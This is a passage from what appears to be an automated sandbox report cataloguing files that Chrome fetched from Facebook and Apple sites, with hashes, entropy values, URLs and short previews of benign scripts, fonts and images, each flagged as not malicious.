                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BaseContextualLayerAvailableHeightContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerContextSizeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerDefaultContainer.react",["LegacyHidden","react","stylex","testID"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||d("react");b=j.forwardRef(a);function a(a,b){var d=a.children,e=a.hidden;a.presencePayload;var f=a.stopClickPropagation,g=a.testid;a=a.xstyle;return j.jsx(c("LegacyHidden"),{htmlAttributes:babelHelpers["extends"]({},c("testID")(g),{className:(h||(h=c("stylex")))(a),onClick:f===!0?function(a){return a.stopPropagation()}:void 0}),mode:e?"hidden":"visible",ref:b,children:d})}a.displayName=a.name+" [from "+f.id+"]";e=b;g["default"]=e}),98);.__d("BaseContextualLayerLayerAdjustmentContext",["react"],(function(a,b,c,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format, TrueType, length 10380, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10380
                                                                                                                                                                                                                                Entropy (8bit):7.960698675136466
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:wTBTIh6auIWVQOv4Rh3hOpcN+Ho5E9Qdyi1vBH5eITpvRCobJNblSq/:wFW6aQwRFU4cwNdyifTH3Jd
                                                                                                                                                                                                                                MD5:9CACA193FE7BFF016EF17E26937711D9
                                                                                                                                                                                                                                SHA1:121E523FE8F27D18017C2F7A056F2F14BF43BFC9
                                                                                                                                                                                                                                SHA-256:3B7D2B4C5417A697678081ED3B344955F0B25E694171178B0C01E029B4A18E8B
                                                                                                                                                                                                                                SHA-512:280F17FBEFA9682CECCDAAEB9D4CB5B283F22F3B403FC03420FF3BB51084F8820AE726DD6D3F3308D0EB2939E1A067C28F6F466AD5E7C736A79FEC85AADD2E31
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/wss/fonts/SF-Pro-Icons/v1/SFProIcons_regular.woff
                                                                                                                                                                                                                                Preview:wOFF......(.................................GSUB.......;...T .%zOS/2...D...D...V..pWcmap...........p..$.glyf...t...O...l...^head......./...6...Chhea...........$....hmtx.......S....64..loca...d.........*.Xmaxp...<....... ...:name...\.........S\.post..&8...Q....Ajkx.c`d``.b0`.c`rq..a..I,.c.b`a...<2.1'3=.......i. f....&;.H.x.c`d?.8........L..F9..|.!.I........+.HsMapP...M.....y... 9.'..;x....R.W.......{.AH.&(.%&&&j..{A..QI.$.\..+.r5.....=]....Y..+..8.Pl...-..h.....i.;.......J..y.......sft.M..f..e.k[.....`......mh'...G..~..5..'..7o.g...nr.........Xc..l..#..l..3vx..^..O../..+..M?];.t..g.>.....1....1.o....9.a.9...|.|..G9..|.<.=.....%Nr.e..4_..g...8....9.s..Y.".....r...`...?S..>z...^.......7..=..N..%..Jk8..f8#..pZ(...P:...t..D.........'.4Jo8s..p.(...R......I....2..+e$.\.h8..p.)..\S&...L..N....r .....&P..w.r8......Q{@..].......>.fx.P[x.P{x.PG..Pgx.QW...;...'...7.../...?..h ..h0..h(..h8..h$..h4..h,..h<..h"..h2..h*..n.pk.#A=....lP..zv<.3.D.q.B.{.b...R....p3.S.B..B+A
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5671)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):31589
                                                                                                                                                                                                                                Entropy (8bit):5.294834621726941
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:/mgUaozX0BYAqIkvN+P5wRgsZ034sCh4Ni:/mBayFS54sCu0
                                                                                                                                                                                                                                MD5:B27D43AE35D63DDA7645B7E2184B6EA4
                                                                                                                                                                                                                                SHA1:4F8D7E7858A8F295020D6A5D97BC829043146C0B
                                                                                                                                                                                                                                SHA-256:A90C6FD2D1EBB37CBEF5CB96AC530805D7D981C5BC3F51A1B30F9C80BEC9C7AA
                                                                                                                                                                                                                                SHA-512:3A0239E36F67FAAE360473AA6574306C251333EB300D6C5A7F6165756633BD543B30E5471E51830DBABC4F039AE70A3467D08B3E4366662BF714B34E0DDD9E52
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ikpZ4/yJ/l/en_GB/GW1DkJBvUCz.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractContextualDialogKeepInViewportBehavior",["ContextualLayerDimensions","Event","Vector","abstractMethod","throttle"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this._layer=a,this._listeners=[],this._subscription=null,this._minimumTop=null}var c=a.prototype;c.enable=function(){var a=this,b=this._layer.getArrowDimensions();this._arrowOffset=b.offset;b=b.length;this._arrowBuffer=this._arrowOffset+b;this._subscription=this._layer.subscribe(["show","hide","reposition"],function(b,c){if(a._layer.isFixed())return;b=="reposition"?(a._calculateMinimumTop(c),a._adjustForScroll()):b=="show"?(a._attachScroll(),a._adjustForScroll()):a._detachScroll()});this._layer.isShown()&&this._attachScroll()};c.disable=function(){this._layer.isShown()&&this._detachScroll(),this._subscription.unsubscribe(),this._subscription=null};c.__adjustForScroll=function(a,c){return b("abstractMethod")("AbstractContextualDialogArrowBehavior","__adjustForScroll")};c._attachSc
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (31602)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60383
                                                                                                                                                                                                                                Entropy (8bit):5.617736642944004
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:VmmMY1cI2Ou48U4x1xB9Gpvv5JVscSiJjWJ/eJ5FauwlD23t/JQoC5ptGu1zgLHJ:lPlP2B6k8T3Fasu1q
                                                                                                                                                                                                                                MD5:BB1C0F2986E5F11E90400935AF70C211
                                                                                                                                                                                                                                SHA1:6777F4F8D572B8C7D288C9672C67C0D180ACB8D7
                                                                                                                                                                                                                                SHA-256:39B0833EECCC09E87C4C6DCEEA425CCA6A3A837785C26C9DFDE1E867FFA69C65
                                                                                                                                                                                                                                SHA-512:01DEEF36E0B24E1164EBE507076328BDAC4B219E7BA080BCCBCBC01D25027B3F1DB020E966B4B09792B1F1051155B10A751E2DC53531DE2A175966C57B1C36A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="en" id="facebook" class="no_js">.<head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="lPBYSIch">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXgONA8fCKnsGI7-Trk","stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ7zhOZlKDbaDDOqH64","isCQuick":false,"brsid":"7419924243182830208"});</script><script nonce="lPBYSIch">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="lPBYSIch"></style><script nonce="lPBYSIch">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/ajax/webstorage/process_keys/?state=1&amp;
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):292
                                                                                                                                                                                                                                Entropy (8bit):6.87475365001795
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:6v/lhPo+r1FBRhjfg6GfiM5Si0v7Z/7PBDEaXWaCKdJ9Q4PhLJp:6v/7g+r1nR1I6Gt30vhKaCG95LH
                                                                                                                                                                                                                                MD5:12F3209EEC7A89408D70278032009D42
                                                                                                                                                                                                                                SHA1:8CA4CFCD281AB0560BFA87FF8742047FA6659865
                                                                                                                                                                                                                                SHA-256:AA17F3618C883483CE90CD31AE01807445609641DE04E57154B698DBA3F59BC9
                                                                                                                                                                                                                                SHA-512:D2209AAC8DE020C0376F01CBEE87AC82D537FA0073129148C50A30486D570FB4340C2C0F9B30020C8C7A8B291443608175CEDA46010C1370EFD5E07C8C7EE16E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/button_glyphs/video_control_play_white-12f3209eec7a89408d70278032009d42.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............gAMA......a.....IDATX...*.`...#.....d6.H.9.......u...0+7.,.R,..8.,............g...{.F......$-]=..)..W.6.%.w?]X.?..#.Y.WmcI.z..$A83...p`2..-#I...dA81..y.g"...,H'..d.;.....'.":.O6.......}j6.<u......Fs+...xn..k..7.`.`b.^.qk.x}{....D.0.V"Gvi5....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1088
                                                                                                                                                                                                                                Entropy (8bit):7.610325181044741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:uvgoNh6mLLNND2mILta9Ii/at+/Js7h2RSguCj0qZm:uNL6yDlILt+E+/qsXTj0H
                                                                                                                                                                                                                                MD5:34A7EFD9D234F514AD44018A2CE51F7C
                                                                                                                                                                                                                                SHA1:1814802705A94C4E6571EE3E2D52E8B3F3B5B5A5
                                                                                                                                                                                                                                SHA-256:FF6F8ABA48CB13DA06E29AB490C4F94ADC2CE27F0ADA4AEBC7C48923673C4B37
                                                                                                                                                                                                                                SHA-512:4B6CC2AD0DAE116575D2094406CCF45F2D62BDEAD70E5C0FFF7C1066FEA5B20EF41D4B2784FE2B38A2D729876F4AF98A171086EF064F723A776495DE369C70F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF8...WEBPVP8X..............VP8 ....0....*....>.H.H."..Y..4.D...t.".77..?........n..a...{......b.`=e?.z.........3..........."..U...*.L.d %C..=..2..^=.Ar.n....H#....=...........OjkeF>._>p.G-.G...^..k...{o.OKG..j.".u.:...4......i..?.C!.*.L.d.@...^....].h..p..,.:...I.1.x4........../.....?.x.n...... ....x...8...#.m.c..t.T"....1..X}...Q.L.....l.+r..mvO?i.x..o9.hX.8.ZjP........d..8.....jg.@..g..A)...!n&/.s.#....V.I. ...?c.C$.c.O...j........AR..1.E.....H........mN......k..t|l.U.O^..;.{,....7....O.=C.P..)v.2...j.na...1.c^N.:o..).TV.y$aD..f..)O.k,j...0....+`...6..;.B...ar.,;....|e.m:....p...M.....q..n...^%.b..).n.V.../=.2.%..y..=..H...QP..P..E..d.S.s.McE.c.@...P`.:%.HO.\.i...Q|.H.=.k.d....b........../$..JQ..5# I[..k.H....x.E..H.i......$..R.E.A...*...#....w.D.%.pS7....C3..m..Yjo.0k.....&..Y.i." s...B..!Q...d}.....D+|G.8..p...*..z...3T.b3..p..I-.1<..'.n_.....<w.J...=7.........<;{..].A..j."..|WG@x..=.hH.M.........n...=ir..j...........EXIF[...II*.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                Entropy (8bit):4.888607732157158
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:hFLei3+dskwMKBEXCzDzP+rY:hFREsXDaM
                                                                                                                                                                                                                                MD5:943ACBC823F865D15FC1030B147417E8
                                                                                                                                                                                                                                SHA1:106E3FF5D9C6514771D715F35D86BA4692208DB1
                                                                                                                                                                                                                                SHA-256:C477A2FA06FD8DD5A89D005E371ED332C588B7EDA420D1F0BF659BA2603FF7F1
                                                                                                                                                                                                                                SHA-512:6F6ACA8C53815730690D51B19D6E19F7AA87758E1D176E188EBE56D1CDEB2096E67C33DF908BAF6DE43FA72551AD91B37B615DFF211C5C1E9E16EB3DC54CDDC1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwm9UHR0oUdHIBIFDXhvEhkSBQ3Fk8Qk?alt=proto
                                                                                                                                                                                                                                Preview:CjIKCw14bxIZGgQIVhgCCiMNxZPEJBoECEsYAioWCApSEgoIQCEuIyRfKi0QARj/////Dw==
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65005)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):696227
                                                                                                                                                                                                                                Entropy (8bit):5.38605387106501
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:MGryUmPKObVMvcDMbtZNNVJKEq5f+dtaL6rHYGd/0GOCl/FQ1:TryUmiObivKMJZNTJKjp+dtaLq/FQ1
                                                                                                                                                                                                                                MD5:90ED61CCFDBF59C72D9D5422BEA4C15D
                                                                                                                                                                                                                                SHA1:DEC09B632108E19481F94F9CBD378E7AEB11452F
                                                                                                                                                                                                                                SHA-256:6604C5A7BFA2E3F142248368D7C69135A8191D03C72D1024807150C32F4E8E55
                                                                                                                                                                                                                                SHA-512:E99CFB370A8AF78ADA7252C5C28756731BBCDB28B71C7B671473C461BCF76A6147111D585A89631CEE3A0F693D45F7A9D3DC7462790EF8048631D96C457694D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/musickit/v2/amp/musickit.js?t=1726695429822
                                                                                                                                                                                                                                Preview:/**. * IMPORTANT NOTE:. *. * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. *. * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */..!function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n((e="undefined"!=typeof globalThis?globalThis:e||self).MusicKit={})}(this,(function(e){"use strict";var n=void 0!==typeof self?self:this;function formatArtworkURL(e,n,d){return n=n||e.height||100,d=d||e.width||100,window.devicePixelRatio>=1.5&&(d*=2,n*=2),e.url.replace("{h}",""+n).replace("{w}",""+d).replace("{f}","jpeg")}const
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):588
                                                                                                                                                                                                                                Entropy (8bit):4.891214981444774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:tc9ptxMwllHVjfiva4/ZPdtIdLbPYovbIdMP1g1IdO2d4IdOPizL:tc9ptxMwllHVLT4/ZP0xPYSsKP1gC42V
                                                                                                                                                                                                                                MD5:EC0707C56BC834ADF5DD504C555D4982
                                                                                                                                                                                                                                SHA1:B04EB2CC743F5E5E2BC4B351099BE50020EAA53C
                                                                                                                                                                                                                                SHA-256:4E1DB999FEC000326552BE3E141AF46AEC9B23664ECF9B41E831089E5DF0E4FC
                                                                                                                                                                                                                                SHA-512:D27F3CBB4FEFE2A3C538EF94EA5CC568423BD98AE3361B45F7E47EAC98D318DB741D08344B5EE64DC492989486C62925847043E72AC4CDE54C96B279F4536BE6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:<svg viewBox="0 0 125 23" xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill-rule="evenodd" stroke-linejoin="round" stroke-miterlimit="1.41" clip-rule="evenodd"><path fill="#8e8e93" d="M113.5 0L110 9h-8l6.63 4.88-2.62 9.12 7.5-6 7.5 6-2.63-9.13L125.01 9h-8l-3.5-9zM88 0l-3.5 9h-8l6.62 4.88L80.5 23l7.5-6 7.5 6-2.63-9.13L99.5 9h-8L88 0zM62.49 0l-3.5 9h-8l6.62 4.88L55 23l7.5-6 7.5 6-2.63-9.13L74 9h-8l-3.5-9zM36.97 0l-3.5 9h-8l6.63 4.88L29.47 23l7.5-6 7.5 6-2.62-9.13L48.47 9h-8l-3.5-9zM11.46 0l-3.5 9h-8l6.63 4.88L3.96 23l7.5-6 7.5 6-2.62-9.13L22.96 9h-8l-3.5-9z"/></svg>.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1088
                                                                                                                                                                                                                                Entropy (8bit):7.610325181044741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:uvgoNh6mLLNND2mILta9Ii/at+/Js7h2RSguCj0qZm:uNL6yDlILt+E+/qsXTj0H
                                                                                                                                                                                                                                MD5:34A7EFD9D234F514AD44018A2CE51F7C
                                                                                                                                                                                                                                SHA1:1814802705A94C4E6571EE3E2D52E8B3F3B5B5A5
                                                                                                                                                                                                                                SHA-256:FF6F8ABA48CB13DA06E29AB490C4F94ADC2CE27F0ADA4AEBC7C48923673C4B37
                                                                                                                                                                                                                                SHA-512:4B6CC2AD0DAE116575D2094406CCF45F2D62BDEAD70E5C0FFF7C1066FEA5B20EF41D4B2784FE2B38A2D729876F4AF98A171086EF064F723A776495DE369C70F1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/17/ee/40/17ee4015-c746-3909-e5ad-5310657469ad/logo_youtube_color-0-0-1x_U007emarketing-0-0-0-6-0-0-0-85-220.png/146x0w.webp
                                                                                                                                                                                                                                Preview:RIFF8...WEBPVP8X..............VP8 ....0....*....>.H.H."..Y..4.D...t.".77..?........n..a...{......b.`=e?.z.........3..........."..U...*.L.d %C..=..2..^=.Ar.n....H#....=...........OjkeF>._>p.G-.G...^..k...{o.OKG..j.".u.:...4......i..?.C!.*.L.d.@...^....].h..p..,.:...I.1.x4........../.....?.x.n...... ....x...8...#.m.c..t.T"....1..X}...Q.L.....l.+r..mvO?i.x..o9.hX.8.ZjP........d..8.....jg.@..g..A)...!n&/.s.#....V.I. ...?c.C$.c.O...j........AR..1.E.....H........mN......k..t|l.U.O^..;.{,....7....O.=C.P..)v.2...j.na...1.c^N.:o..).TV.y$aD..f..)O.k,j...0....+`...6..;.B...ar.,;....|e.m:....p...M.....q..n...^%.b..).n.V.../=.2.%..y..=..H...QP..P..E..d.S.s.McE.c.@...P`.:%.HO.\.i...Q|.H.=.k.d....b........../$..JQ..5# I[..k.H....x.E..H.i......$..R.E.A...*...#....w.D.%.pS7....C3..m..Yjo.0k.....&..Y.i." s...B..!Q...d}.....D+|G.8..p...*..z...3T.b3..p..I-.1<..'.n_.....<w.J...=7.........<;{..].A..j."..|WG@x..=.hH.M.........n...=ir..j...........EXIF[...II*.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 306 x 90, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3754
                                                                                                                                                                                                                                Entropy (8bit):7.891960792073307
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:pVR8tAXdv46Nbd/o5AQ1MyzREs9wrTirdu:/RfvjNJQ5AJUEsVo
                                                                                                                                                                                                                                MD5:4B70F6FAE44727678540B68E876908B1
                                                                                                                                                                                                                                SHA1:D5A23520ACDF18636380E1A88D3DE2A1EFBF6CE1
                                                                                                                                                                                                                                SHA-256:14C09561486BA385A8A62BC0A8B41E03638A6334648113A7F28BE47271ECCB5E
                                                                                                                                                                                                                                SHA-512:F00497BBF393F680C0352C4485E74FC7519557EC6DAE6FEDEEB206B094AC849C1FBCCD62DD5943FC8B40247245065FD81E170846BC0DA8A3FC33E332352EC7C3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...2...Z.......*t....PLTE.........................................................ccc...............777mmm.........rrr......\\\.........)))...KKK...222.........@@@......$$$......bbb.........kkk000```........FFF........[[[PPPhhh............"""...:::......YYYppp555'''... {{{...~~~......HHH...VVV............yyy......................SSSuuu.............xxx...999...MMM___fff.........%%%.........<<<BBB+++444>>>........+....%tRNS.,......} .......H..........8........lO,.....IDATx...K..@....tq.A.u@.Q.u.....Xig..Kj..R.....}..-..IRg....b.[....V..ls.;k.X[.......5...8...F..;f.Q..tBv..U.......VotE(...F7Db.7j`.P....~2&c...r..woOi.....}.{...G...B4.a.D.W..g..%.X.S=WD.V.Zm....!$.@4.v.5.......mx.b&..u..3......(....+..o2......7....!...S.a<.O.P....;.I#.....c..w..$.~A2y...XI695=3. ._G.7...A.Y..-%.C...h.H6..?Y.u.'C....R.=....O$2.`!2..%...S.E.M48V......<.,.G....Y.0..Z.L....~/..any`...H.+.H,.l.g-,A#.....~R2..s>..d...`x.Y.2.nr..8{..s...ry...,.......}..:..>.%[8`VT.0Lv.H&.a
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):11794
                                                                                                                                                                                                                                Entropy (8bit):7.981205654531022
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:h0QcbTomyT/d9M2QYEcUc6GgVVYBOLMwHCG+1vm3cutU41HVHvEbN9Oslv0cE8Bu:h0smyzw2QPJGgz9V+5m3cwxzHcbNNlvw
                                                                                                                                                                                                                                MD5:66E3AA84063184FE950C811E70715E7E
                                                                                                                                                                                                                                SHA1:3E71B81A617DCBEF5939E1DABC487A8FF1F06996
                                                                                                                                                                                                                                SHA-256:9E79717DE830CE55822C38DA925539643224A08C1B7C8F7B21F92CE0EA77DCEB
                                                                                                                                                                                                                                SHA-512:642E18C209D4060D481E947B4FE3C8C5615EAAEA1F4EC98E82EDC8D4B488F07714A68FC617DAD453959A2D8D3C590FA170263C526FF2C1675EA2C5E105BF1944
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/43/ca/45/43ca45f2-1eb7-fd56-ce61-157e37441ff9/c556b652-5cf7-4c3d-8cfe-b972766129b0_2_iOS_6.7.jpg/230x0w.webp
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 .-.......*....>.L.I$"(.)]...D.....>...#.z?._....4........s..././.v..}..^<.j.......r.....[......=j..~.............._z...........+....A}.....U.<.........>C.a.'./.?....J..v....B=..../.OL...".;....o............O...7.....>......u....|wp.....Z.'.Hj.Y..Q.-4!....r.....X.E..Z....t...[B^-q.R..7..{..Z.@.B..g+.K........w.Y^...V[...<...\....@_.".-..A.Y@^.-...m.`..%q....M2....{n..a.3....b..C....}..x\$?.3..8T..$b..z.!B......4.3..L.k.T..G..s>.3R.hA.P.V..G..\M...a.MI]a.,.....k.."............#.;............lc.../...._.,TW...a_...o..._...Z........[H.f.3...W..L..6..7.3. .T..o..XF.&.3..Z.a.t.b#...V..G...`l..nB.....=.b.>....!.m.;1QA..M}....\"8Od1..Z]...U."$m.~.;......%ue...\....C..*....1.$.O...W.Z..18..4...m;;..z..o]....qT.....)I.O..@H.@&..i.j.d.6..Rt*UW*e..`.e.......q2.(.r.k.*.hB.|X)*.z._......-.-...SHT....^\b..."....r ..ZU...x..Y..6..A.Y.......k.V.Q.k...a.V..H..gT...u..9....b.~.1..[8...M........)...R..QsV....m..y.[....@.{
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                Entropy (8bit):7.454104258058445
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:6v/7K/eqPymvzlPXBpjOCHdqElk9UjJbtxkZFdNiYWkW80m9SWkCufVN1irXYSfZ:TTH9BZOetBterGbkEKWCtV
                                                                                                                                                                                                                                MD5:1E5A92669FCA2EB7B9174FEB5F52612F
                                                                                                                                                                                                                                SHA1:28DEBACAE4E549EFA49CFA56E9EB4A03E057BF3E
                                                                                                                                                                                                                                SHA-256:BAE890B102159778D15CCBF68F5EA5F7220722799003F7E760DF2047CF8E9C1B
                                                                                                                                                                                                                                SHA-512:1671046E2BAE322F419A1C795E1CEC0208DB536137534A9DC7A27B28F294E2DAE1AE0AF7098A38DB20FE41A6E0AFC06964B9D3735988F083B7C5009B389EAC10
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8.......;.....sRGB........DeXIfMM.*.......i.......................................8...........8.....WhS....IDATh..k.A..s.E..1.H...),L.Gc@.A.[!]..hic. X...L.6.AT...P.>.Q4.F.P|E....a.....d.|..3....w....b.b.b.b.b.b.b.b.b.VH....~..<ZV%SP.......eQ$.l.S.*..@.9.>HQ.^c2.6..D.A..T......}F.......?..7.........F...y...u....7 ..../.......t....fU..=`R.;w..........U........an..&....w.......CY7...4...!..m3@...uY"8.....5.y....2Y.q..I>.j.M..ZE...L..3.......~7......2....yy....n.jW.I26@zI..e.V]^U5";.......|..7...........;..;...!I_.J...p...6..<.n.Lo./...-...y.\.L..W.....r...^2.._....+.?O.zY..Zag1...4....Q...G.2W.6..t...Z}G.lO.jSEe....._.w..B... ..`8.Rm:%.1K..V%....Z....a.k.+d.2...g...%.=...M......{[......Zj2.M.0,.....r.5.!..........f_...1...f\......d...4..a..OV..5..43..M-&+9...H.Z.rE.=..;..e....\....Y..0X...}..."z.k'.a`.<...-..=p.W./..b.b.b.b.b.b.b.b.b.b.....>.v.........IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):789
                                                                                                                                                                                                                                Entropy (8bit):5.334449178191508
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:PNfsAAjdxPVGIdxeTdxly7dxPdx76dxisdxI5:lfRcdpcIdATdwdVdZ6dssdM
                                                                                                                                                                                                                                MD5:BFD437AC6F199108032972C3BD8173CC
                                                                                                                                                                                                                                SHA1:E934C27E6207D4C316EC8313C94B898452E8613B
                                                                                                                                                                                                                                SHA-256:1E3746CB4C2F76B60E1F76B6828F1BC6C19B9795330CB6E7FFBA4C775C30E82F
                                                                                                                                                                                                                                SHA-512:8CB2FC52CF8C65D50F15913C37ACD30B11324F0845C07C4DED62B566D2B56005C46C48C1DE4FC46611028B10BC9602ECDB8CB21F2B9FDA6C4BCA02DFCF002B05
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
